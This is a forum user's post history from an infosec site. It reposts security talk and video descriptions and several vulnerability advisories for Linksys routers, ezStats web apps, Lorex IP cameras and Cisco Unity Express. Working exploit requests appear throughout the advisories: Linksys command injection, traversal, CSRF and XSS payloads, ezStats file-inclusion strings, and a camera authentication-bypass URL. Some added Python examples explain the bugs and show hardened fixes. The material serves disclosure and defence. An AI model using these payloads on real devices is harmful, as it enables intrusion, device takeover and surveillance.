
Praetorian503


Everything posted by Praetorian503

  1. Description: We as a global society are extremely vulnerable and at risk for a catastrophic cyber event. Global society needs the best and brightest to help secure our most valued resources in cyberspace: our intellectual property, our critical infrastructure and our privacy. DEF CON has an important place in computer security. It taps into a broad range of talent and provides an unprecedented diversity of experiences and expertise to solve tough problems. The hacker community and USG cyber community share some core values: we both see the Internet as an immensely positive force; we both believe information increases in value by sharing; we both respect protection of privacy and civil liberties; we both believe in the need for oversight that fosters innovation, doesn't pick winners and losers, and retains freedom and flexibility; we both oppose malicious and criminal behavior. We should build on this common ground because we have a shared responsibility to secure cyberspace. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Shared Values, Shared Responsibility
  2. Description: First of all, we love SpeedTest.net. Even with its Flash-based War Games effects, it's still our go-to site when investigating slow network connections. That's why we were a little taken aback when we discovered an Invincea blog post noting that our beloved site was involved in exploiting visitors using one of the recent Java vulnerabilities. The main theme behind the Invincea post wasn't necessarily their browser sandboxing product per se (although it does look helpful) but more on emphasizing "that the highest concentration of online security threats are in fact legitimate destinations visited by mass audiences." In the detailed post Eddie Mitchell analyzes the attack on SpeedTest.net. One of the key findings was that the popular site didn't actually host any Java exploit code but simply redirected visitors to another site that did. Source: https://www.novainfosec.com/2013/02/05/speedtest-net-pushing-java-exploit/ Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Popular Site Speedtest.Net Compromised By Exploit And Pushing Java Exploit
  3. Description: In this video I will show you how to use Railgun for creating a file and modifying it using the irb shell. If these functions are not available in your Metasploit directory, you need to define them manually or just update your framework. There are lots of tricks available for exploiting a system using Railgun. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Post-Exploitation Railgun File Creation And Beep
  4. Description: In this video I will show you how to edit a file's creation date/time using Metasploit Timestomp. Using Timestomp we can change the MACE values of a file (Modified, Accessed, Created, Entry). You can change the Created, Modified and Accessed date-time. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Post-Exploitation: Metasploit Timestomp
  5. Description: When there's no technical vulnerability to exploit, you should try to hack what humans left for you, and believe me, this always works. Scylla provides all the power that a real audit, intrusion, exclusion and analysis tool needs, giving the possibility of scanning for misconfiguration bugs dynamically. Scylla aims to be a better tool for security auditors: extremely fast, designed based on real scenarios, developed by experienced coders and constructed with actual IT work methods. The words "Configuration Tracer" are the best definition for Scylla, a tool to help with IT audits. Sergio 'flacman' Valderrama has been a coder and hacker since he was in school (15 years old?). Consulting Manager of 2Secure S.A.S, he has worked as a security consultant for more than 6 years. Founder of the ColombiaUnderground Team, he studied Computer Engineering at the Universidad de los Andes... (a lot of uninteresting crap about titles and experience). And of course, he's the main developer of Scylla. Carlos Alberto Rodriguez is Co-Founder at 2Secure, a Colombia-based company that provides specialized security services for companies in multiple sectors. Senior Developer focused on security development with emphasis on cryptographic algorithms, Senior Security Consultant, R&D Manager and Security Applications Leader for 2Secure with over 7 years of experience in security and incident handling. Twitter: @_S_aint_Iker Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Scylla: Because There's No Patch For Human Stupidity
  6. Linksys models E1500 and E2500 suffer from cross site request forgery, cross site scripting, OS command injection, and directory traversal vulnerabilities.

     Device Name: Linksys E1500 / E2500
     Vendor: Linksys

     ============
     Device Description:
     ============
     The Linksys E1500 is a Wireless-N Router with SpeedBoost. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files. The installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page.
     Source: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=...

     ============
     Vulnerable Firmware Releases - e1500:
     ============
     Firmware-Version: v1.0.00 - build 9 Feb. 17, 2011
     Firmware-Version: v1.0.04 - build 2 Mar. 8, 2012
     Firmware-Version: v1.0.05 - build 1 Aug. 23, 2012

     ============
     Vulnerable Firmware Releases - e2500:
     ============
     Firmware Version: v1.0.03 (only tested for the known OS command injection)
     Other versions may also be affected.

     ============
     Shodan Dorks
     ============
     Shodan Search: linksys e1500
     Shodan Search: linksys e2500

     ============
     Vulnerability Overview:
     ============

     * OS Command Injection / E1500 and E2500 v1.0.03
       => Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26

     The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or to upload and execute a backdoor to compromise the device. You need to be authenticated to the device, or you have to find other methods for inserting the malicious commands.

     Example Exploit:

     POST /apply.cgi HTTP/1.1
     Host: 192.168.178.199
     User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Proxy-Connection: keep-alive
     Referer: http://192.168.178.199/Diagnostics.asp
     Authorization: Basic xxxx
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 185
     Connection: close

     submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=

     Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:

     http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=

     Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png

     * Directory traversal - tested on E1500
       => Parameter: next_page

     Access local files of the device. You need to be authenticated, or you have to find other methods for accessing the device.

     Request:

     POST /apply.cgi HTTP/1.1
     Host: 192.168.178.199
     User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Proxy-Connection: keep-alive
     Referer: http://192.168.178.199/Wireless_Basic.asp
     Authorization: Basic YWRtaW46YWRtaW4=
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 75

     submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version

     Response:

     HTTP/1.1 200 Ok
     Server: httpd
     Date: Thu, 01 Jan 1970 00:00:29 GMT
     Cache-Control: no-cache
     Pragma: no-cache
     Expires: 0
     Content-Type: text/html
     Connection: close

     Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012

     Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png

     * The current password is not requested when changing the password - tested on E1500

     With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

     Example Request:

     POST /apply.cgi HTTP/1.1
     Host: 192.168.1.1
     User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Proxy-Connection: keep-alive
     Referer: http://192.168.1.1/Management.asp
     Authorization: Basic xxxx
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 311

     submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

     * CSRF for changing the password without knowing the current one; the attacker is also able to activate remote management - tested on E1500:

     http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

     * Reflected Cross Site Scripting - tested on E1500
       => Parameter: wait_time=3'%3balert('pwnd')//

     Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.

     Example Exploit:

     POST /apply.cgi HTTP/1.1
     Host: 192.168.178.199
     User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Proxy-Connection: keep-alive
     Referer: http://192.168.178.199/Wireless_Basic.asp
     Authorization: Basic xxxx
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 300

     submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

     Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png

     * Redirection - tested on E1500
       => Parameter: submit_button=http://www.pwnd.pwnd%0a

     Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

     Example Exploit:

     POST /apply.cgi HTTP/1.1
     Host: 192.168.178.199
     User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Proxy-Connection: keep-alive
     Referer: http://192.168.178.199/Wireless_Basic.asp
     Authorization: Basic xxxx
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 290

     submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

     Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png

     ============
     Solution
     ============
     No known solution available.

     ============
     Credits
     ============
     The vulnerability was discovered by Michael Messner
     Mail: devnull#at#s3cur1ty#dot#de
     Web: http://www.s3cur1ty.de
     Advisory URL: http://www.s3cur1ty.de/m1adv2013-004
     Twitter: @s3cur1ty_de

     ============
     Time Line:
     ============
     October 2012 - discovered vulnerability
     21.10.2012 - contacted Linksys with vulnerability details
     23.10.2012 - Linksys requested to check new firmware v1.0.05 build 1
     27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1
     27.10.2012 - contacted Linksys with vulnerability details in release v1.0.05 build 1
     29.10.2012 - Linksys responded with case number
     13.11.2012 - /me requested update of the progress
     15.11.2012 - Linksys sends Beta Agreement
     16.11.2012 - Linksys sends the Beta Firmware for testing
     16.11.2012 - tested Beta version
     18.11.2012 - informed Linksys about the results
     30.11.2012 - reported the same OS Command injection vulnerability in model E2500
     10.12.2012 - /me requested update of the progress
     23.12.2012 - Update to Linksys with directory traversal vulnerability
     09.01.2013 - Case closed
     05.02.2013 - public release

     =====================
     Advisory end
     =====================

     Source: PacketStorm
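The ping_size injection in the Linksys advisory above works because the decoded field is spliced into a shell command line. The following is an added example, not the advisory author's code or anything from the firmware: it decodes the advisory's own exploit body, models the unsafe command construction (the exact `ping` flags used by the device are an assumption), and shows the type check plus argv-style invocation that would have rejected the payload.

```python
"""Added example: Linksys ping_size command injection, vulnerable vs. hardened."""
import ipaddress
from urllib.parse import parse_qs

# Request body copied from the advisory's example exploit (constructed input).
EXPLOIT_BODY = (
    "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping"
    "&action=&commit=0&ping_ip=1.1.1.1"
    "&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip="
)


def parse_body(body: str) -> dict:
    """Decode an x-www-form-urlencoded body into single-valued fields.
    parse_qs splits on '&' *before* percent-decoding, so %26 survives as a
    literal '&' inside ping_size."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_command(fields: dict) -> str:
    """Models a CGI that interpolates decoded fields into one shell line
    (flag layout is an assumption). The embedded '&' characters terminate
    the ping invocation and run the attacker's text as a separate job."""
    return f"ping -c {fields['ping_times']} -s {fields['ping_size']} {fields['ping_ip']}"


def injected_jobs(shell_line: str) -> list:
    """Split a command line on '&' the way a Bourne shell would when it
    backgrounds jobs; each element is executed as its own command."""
    return [part.strip() for part in shell_line.split("&") if part.strip()]


def hardened_argv(fields: dict) -> list:
    """Validate every field against its expected type and return an argv
    list for subprocess.run(argv, shell=False); no shell ever sees the
    values, and non-numeric sizes are refused outright."""
    size, count, ip = fields["ping_size"], fields["ping_times"], fields["ping_ip"]
    if not (size.isdigit() and 0 < int(size) <= 65500):
        raise ValueError(f"bad ping_size: {size!r}")
    if not (count.isdigit() and 0 < int(count) <= 100):
        raise ValueError(f"bad ping_times: {count!r}")
    ipaddress.ip_address(ip)  # raises ValueError for anything but an IP literal
    return ["ping", "-c", count, "-s", size, ip]


def accepts(fields: dict) -> bool:
    """True if the hardened handler would run the request."""
    try:
        hardened_argv(fields)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    f = parse_body(EXPLOIT_BODY)
    print("decoded ping_size :", repr(f["ping_size"]))
    print("shell would run   :", injected_jobs(vulnerable_command(f)))
    print("hardened accepts? :", accepts(f))
```

The check is deliberately an allowlist on type and range rather than a blocklist of shell metacharacters; the advisory's GET variant (`ping_size=%26COMMAND%26`) fails the same `isdigit()` test.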
  7. ezStats for Battlefield 3 version 0.91 suffers from cross site scripting and local file inclusion vulnerabilities.

     #################################################
     ### Exploit Title: ezStats for Battlefield 3 v0.91 Multiple Vulnerabilities
     ### Date: 02/05/2013
     ### Author: L0n3ly-H34rT
     ### Contact: l0n3ly_h34rt@hotmail.com
     ### My Site: http://se3c.blogspot.com/
     ### Vendor Link: http://www.ezstats.org/
     ### Software Link: http://ezstats.googlecode.com/files/ezStats2_BF3_v0.91.zip
     ### Tested on: Linux/Windows
     #################################################

     1- Local File Inclusion:
     http://127.0.0.1/ezStats2/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
     http://127.0.0.1/ezStats2/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

     2- XSS:
     http://127.0.0.1/ezStats2/compare.php?common=[XSS]
     http://127.0.0.1/ezStats2/compare.php?rankings=[XSS]

     ############################################
     # Notes:
     1- Must be magic_quotes_gpc = Off
     2- phpinfo(): http://127.0.0.1/ezStats2/admin/apitest.php?info
     # Greetz to my friendz

     Source: PacketStorm
  8. ezStats2 for Playstation Network version 1.10 suffers from a local file inclusion vulnerability.

     #################################################
     ### Exploit Title: ezStats2 for Playstation Network v1.10 Local File Inclusion Vulnerability
     ### Date: 02/05/2013
     ### Author: L0n3ly-H34rT
     ### Contact: l0n3ly_h34rt@hotmail.com
     ### My Site: http://se3c.blogspot.com/
     ### Vendor Link: http://www.ezstats.org/
     ### Software Link: http://ezstats.googlecode.com/files/ezStats2_PSN_v1.10.zip
     ### Tested on: Linux/Windows
     #################################################

     http://127.0.0.1/ezStats2_psn/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
     http://127.0.0.1/ezStats2_psn/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

     ############################################
     # Notes:
     1- Must be magic_quotes_gpc = Off
     2- phpinfo(): http://127.0.0.1/psn/admin/apitest.php?info
     # Greetz to my friendz

     Source: PacketStorm
  9. ezStats2 Serverviewer version 0.62 suffers from a local file inclusion vulnerability.

     #################################################
     ### Exploit Title: ezStats2 Serverviewer v0.62 Local File Inclusion Vulnerability
     ### Date: 02/05/2013
     ### Author: L0n3ly-H34rT
     ### Contact: l0n3ly_h34rt@hotmail.com
     ### My Site: http://se3c.blogspot.com/
     ### Vendor Link: http://www.ezstats.org/
     ### Software Link: http://ezstats.googlecode.com/files/ezStats2_Serverviewer_v0.62.zip
     ### Tested on: Linux/Windows
     #################################################

     http://127.0.0.1/ezServer/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
     http://127.0.0.1/ezServer/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

     ############################################
     # Notes:
     1- Must be magic_quotes_gpc = Off
     2- phpinfo(): http://127.0.0.1/ezServer/admin/apitest.php?info
     # Greetz to my friendz

     Source: PacketStorm
  10. ezStats2 for Medal of Honor Warfighter version 1.0 suffers from a local file inclusion vulnerability.

      #################################################
      ### Exploit Title: ezStats2 for Medal of Honor Warfighter v1.0 Local File Inclusion Vulnerability
      ### Date: 02/05/2013
      ### Author: L0n3ly-H34rT
      ### Contact: l0n3ly_h34rt@hotmail.com
      ### My Site: http://se3c.blogspot.com/
      ### Vendor Link: http://www.ezstats.org/
      ### Software Link: http://ezstats.googlecode.com/files/ezStats2_MoHW_v1.0a.zip
      ### Tested on: Linux/Windows
      #################################################

      http://127.0.0.1/ezStats2_mohw/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
      http://127.0.0.1/ezStats2_mohw/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

      ############################################
      # Notes:
      1- Must be magic_quotes_gpc = Off
      2- phpinfo(): http://127.0.0.1/ezStats2_mohw/admin/apitest.php?info
      # Greetz to my friendz

      Source: PacketStorm
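The four ezStats advisories above all use the same `files=../../windows/win.ini%00.jpg` payload, and the Linksys advisory's `next_page=../../proc/version` is the same bug without the null byte. This added example (mine, not code from ezStats or from any advisory author) models why the trailing `%00.jpg` defeats a suffix check in a NUL-unaware runtime, and shows a resolver that rejects both the traversal and the embedded NUL. The web root path and the `.css/.jpg` suffix allowlist are assumptions; `style.php`'s real logic is not on the page.

```python
"""Added example: path traversal + NUL-byte truncation, and a safe resolver."""
import os
from urllib.parse import unquote

# Payloads taken from the advisories above.
EZSTATS_PAYLOAD = "../../../../../../../../../../windows/win.ini%00.jpg"
LINKSYS_PAYLOAD = "../../proc/version"

# Assumed document root for the include; does not need to exist on disk.
WEB_ROOT = "/var/www/ezStats2/stylesheets"


def naive_extension_check(param: str) -> bool:
    """Models the check the %00 trick targets: only the suffix of the whole
    string is inspected. The string ends in '.jpg', so it passes."""
    return unquote(param).lower().endswith((".css", ".jpg"))


def legacy_open_target(param: str) -> str:
    """Models what a NUL-unaware runtime (old PHP passing the string to a
    C open()) actually opens: everything before the first NUL byte.
    Illustrative model, not the engine's code."""
    return unquote(param).split("\x00", 1)[0]


def resolve_under_root(root: str, param: str) -> str:
    """Hardened resolver: decode once, refuse NUL bytes, canonicalise, and
    require the result to stay inside `root`. Absolute paths and '..'
    sequences both fail the common-path test."""
    name = unquote(param)
    if "\x00" in name:
        raise ValueError("NUL byte in path")
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, name))
    if os.path.commonpath([root_real, target]) != root_real:
        raise ValueError(f"path escapes web root: {name!r}")
    return target


def is_allowed(root: str, param: str) -> bool:
    try:
        resolve_under_root(root, param)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("suffix check passes :", naive_extension_check(EZSTATS_PAYLOAD))
    print("runtime would open  :", legacy_open_target(EZSTATS_PAYLOAD))
    print("hardened allows     :", is_allowed(WEB_ROOT, EZSTATS_PAYLOAD))
```

Note the ordering in `resolve_under_root`: decode, then NUL check, then canonicalise, then compare. Checking the suffix before decoding, or comparing string prefixes instead of `realpath`/`commonpath`, reopens the hole.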
  11. Lorex LNC116 and LNC104 IP cameras only perform basic authentication on the main login page. If you browse directly to any other interface, you are not forcibly authenticated.

      Product: Lorex LNC116 and LNC104 IP Cameras
      Vendor: LOREX Technology Inc.
      Vulnerability Type: Authentication Bypass
      Vulnerable Firmware Version(s): 030312 and earlier
      Tested Firmware Version: 030312
      Fixed Firmware Version: 030405
      Solution Status: Fixed by Vendor
      Vendor Notification: December 22, 2012
      Public Disclosure: February 5, 2013
      CVE Reference: CVE-2012-6451
      Credit: Jason Doyle / Twitter @jasond0yle

      Advisory Details:
      The camera's web interface uses HTTP Basic for authentication, but authentication details are only validated on the home login page. By forced browsing, or navigating directly to any valid URL on the web interface other than the homepage, it is possible to bypass authentication.

      Risk:
      It's possible to view the live video feed and/or change all configurable settings anonymously.

      Proof of Concept:
      Navigate directly to http://x.x.x.x/cgi-bin/display.cgi to view the camera's live video feed anonymously.

      Solution:
      Upgrade to firmware version 030405.

      Source: PacketStorm
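The Lorex bug is a classic per-page authentication check instead of a gate in front of the router. This added example (not Lorex firmware code) models both dispatch styles with the same HTTP Basic verifier so the difference is isolated to where the check runs. The credentials, route table and status codes are constructed for the demo.

```python
"""Added example: per-page vs. global HTTP Basic enforcement (Lorex-style bypass)."""
import base64
import hmac

# Constructed demo credentials; nothing to do with the camera's defaults.
USERNAME, PASSWORD = "admin", "s3cret"
ROUTES = {"/", "/cgi-bin/display.cgi", "/cgi-bin/settings.cgi"}


def header_for(user: str, pw: str) -> str:
    """Build an Authorization header the way a browser would."""
    return "Basic " + base64.b64encode(f"{user}:{pw}".encode()).decode()


def basic_auth_ok(authorization) -> bool:
    """Parse 'Basic <base64(user:pass)>' and compare in constant time.
    Any malformed header is simply a failed login, never an exception."""
    if not authorization or not authorization.startswith("Basic "):
        return False
    try:
        raw = base64.b64decode(authorization[6:], validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return False
    user, _, pw = raw.partition(":")
    return (hmac.compare_digest(user.encode(), USERNAME.encode())
            and hmac.compare_digest(pw.encode(), PASSWORD.encode()))


def vulnerable_dispatch(path: str, authorization) -> int:
    """Models the behaviour the advisory describes: only the home page
    asks for credentials, every other handler trusts the caller."""
    if path == "/" and not basic_auth_ok(authorization):
        return 401
    return 200 if path in ROUTES else 404


def hardened_dispatch(path: str, authorization) -> int:
    """Authenticate before routing, so a new CGI endpoint cannot be added
    without inheriting the check. Unknown paths still get 401, not 404,
    to avoid leaking which endpoints exist."""
    if not basic_auth_ok(authorization):
        return 401
    return 200 if path in ROUTES else 404


if __name__ == "__main__":
    print("vulnerable, no creds:", vulnerable_dispatch("/cgi-bin/display.cgi", None))
    print("hardened,   no creds:", hardened_dispatch("/cgi-bin/display.cgi", None))
    print("hardened, with creds:", hardened_dispatch("/cgi-bin/display.cgi", header_for("admin", "s3cret")))
```

When auditing a device like this, the test is the one the advisory performed: request every discovered path with no `Authorization` header and flag anything that does not return 401.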
  12. Cisco Unity suffers from cross site request forgery and cross site scripting vulnerabilities.

      # Exploit Title: Cisco Unity Express Multiple Vulnerabilities
      # Reported: December 2012
      # Disclosed: February 2013
      # Author: Jacob Holcomb of Independent Security Evaluators
      # CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120
      # http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html

      Cisco Advisory
      http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114
      http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120

      Proof of Concept

      XSS - CVE-2013-1114:

      GET: Reflective XSS & Info disclosure
      http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script>

      Information Disclosure Location: /Web/WEB-INF/screens/main.jsp
      Error Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp

      Internal Servlet Error:
      javax.servlet.ServletException: invalid character at position 1 in >
        org.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source)
        WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245)
        org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
        javax.servlet.http.HttpServlet.service (HttpServlet.java)
        org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
        org.apache.tomcat.core.Handler.invoke (Unknown Source)
        org.apache.tomcat.core.Handler.service (Unknown Source)
        org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
        org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
        java.security.AccessController.doPrivileged (AccessController.java:273)
        org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)
        org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)
        WEB_0002dINF.screens.main._jspService (main.java:396)
        org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
        javax.servlet.http.HttpServlet.service (HttpServlet.java)
        org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
        org.apache.tomcat.core.Handler.invoke (Unknown Source)
        org.apache.tomcat.core.Handler.service (Unknown Source)
        org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
        org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
        java.security.AccessController.doPrivileged (AccessController.java:273)
        org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)
        org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)
        org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)
        com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)
        org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)
        javax.servlet.http.HttpServlet.service (HttpServlet.java)
        javax.servlet.http.HttpServlet.service (HttpServlet.java)
        org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
        org.apache.tomcat.core.Handler.invoke (Unknown Source)
        org.apache.tomcat.core.Handler.service (Unknown Source)
        org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
        org.apache.tomcat.core.ContextManager.internalService (Unknown Source)
        org.apache.tomcat.core.ContextManager.service (Unknown Source)
        org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)
        org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)
        org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)
        java.lang.Thread.run (Thread.java:777)

      Root cause:
      java.lang.NumberFormatException: invalid character at position 1 in >
        java.lang.Throwable.<init> (Throwable.java:166)
        java.lang.Integer.parseInt (Integer.java:775)
        java.lang.Integer.parseInt (Integer.java:262)
        com.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274)
        WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903)
        org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
        javax.servlet.http.HttpServlet.service (HttpServlet.java)
        org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
        org.apache.tomcat.core.Handler.invoke (Unknown Source)
        org.apache.tomcat.core.Handler.service (Unknown Source)
        org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
        org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
        java.security.AccessController.doPrivileged (AccessController.java:273)
        org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)
        org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)
        WEB_0002dINF.screens.main._jspService (main.java:396)
        org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
        javax.servlet.http.HttpServlet.service (HttpServlet.java)
        org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
        org.apache.tomcat.core.Handler.invoke (Unknown Source)
        org.apache.tomcat.core.Handler.service (Unknown Source)
        org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)
        org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
        org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
        java.security.AccessController.doPrivileged (AccessController.java:273)
